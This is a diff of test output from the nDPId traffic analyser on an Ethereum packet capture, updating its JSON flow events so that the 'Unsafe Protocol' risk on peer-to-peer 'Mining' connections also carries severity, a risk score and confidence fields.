-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"}
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1578508365781,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1578508365781,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHjqoAAEARyLjAqAG40WGPAXZfw1AAs7BF2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1645,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365813,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAG8nVeRDeiwKgBuHZf3WKbomHRWAgB9KAScSDEJQAAAgQFrAQCCAppF+qfItiYqQEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1646,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":1578508365813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365813,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4n3AqAG4XkQ3ot1idl9YCAH0m6Jh0oAQECxToAAAAQEICiLYmOdpF+qf"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1647,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365741,"flow_last_seen":1578508365814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"ts_msec":1578508365814,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365828,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365828,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1578508365828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508365828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGW5bAqAG4DfsOx91mdl9PCwRhAAAAALAC\/\/\/02wAAAgQFtAEDAwUBAQgKItiY9AAAAAAEAgAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365846,"flow_last_seen":1578508365846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508365846,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -321,13 +321,13 @@
 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1770,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1578508365899,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"ts_msec":1578508365899,"pkt":"KDc3AG3IEBMx8Tl2CABFAACxNvdAACcRcwrKcBxqwKgBuHZfdl8AnfAw9M4wDHlezlLb\/XVAde5xoPK0MYWPqo8wL1hvUi9RDAnTme70\/IGTzT1fYmed3PImx\/QlqjXSlKRDpOJrSqown1EL4xkYxe9gDpH7mkxI5SW3Td37cSNZr69+s5vwesE7AQLyy4RPFs69gun3gnZfoAhIsWiV\/\/bYUAtK\/XBnLAnnp\/ohE29dCVwVPQWUC9vDhF4WIGE="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1771,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365903,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGwUMj5J40wKgBuHZf3Weyx8H3Rbl\/W6AS\/ogN9wAAAgQFrAQCCAqAlezxItiZBAEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1772,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1578508365903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365903,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtkvAqAG4I+SeNN1ndl9FuX9bssfB+IAQECwq5AAAAQEICiLYmTiAlezx"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1773,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365846,"flow_last_seen":1578508365904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1578508365904,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.158.52","src_port":56679,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1578508365919,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"ts_msec":1578508365919,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc44MAAEARsuTAqAG4p1Z6MnZfdl8AiFGIcmRL\/sJ+HmBFF7n+UfEKJLvDdBgdKzSECJqxpMbuAWJCFnSyz1LOPGHXvK4XvgJfd8y9TVVaoZxiY0SgM1nuu1KcsxmveZ1Iboux45kEq0UHna5hbl98Bua+Zy2zz7pAAAHdBMuEfwAAAYJ2X4J2X8mEp1Z6MoJ2X4CEXhYgYQU="}
-00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1774,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365919,"flow_last_seen":1578508365919,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508365919,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1775,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1578508365925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508365925,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMG5s7PtM7YwKgBuHZf3WknDwC1nc8LZ6AScSCqDAAAAgQFrAQCCApcfI6dItiZJwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1776,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1578508365926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508365926,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG2dbAqAG4z7TO2N1pdl+dzwtnJw8AtoAQECw5oAAAAQEICiLYmUxcfI6d"}
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1777,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365885,"flow_last_seen":1578508365927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":125,"midstream":0,"ts_msec":1578508365927,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1578508365951,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"ts_msec":1578508365951,"pkt":"KDc3AG3IEBMx8Tl2CABFAACvrTpAADMRthqnVnoywKgBuHZfdl8AmyGXAff4avCCJKd8iLkYnGp5WBGcR5kwKjaGYfuGK7O5Pxha3PZrVargsE3sp+V969kCE0ZShXRyP212X0\/ogX+KLxU0BMrg9yur0MCSn4OC+hF8e78p1SovnEhcJv1j5UvsAALwyYSnVnoygnZfgKByZEv+wn4eYEUXuf5R8Qoku8N0GB0rNIQImrGkxu4BYoReFiBh"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"}
@@ -336,98 +336,98 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"}
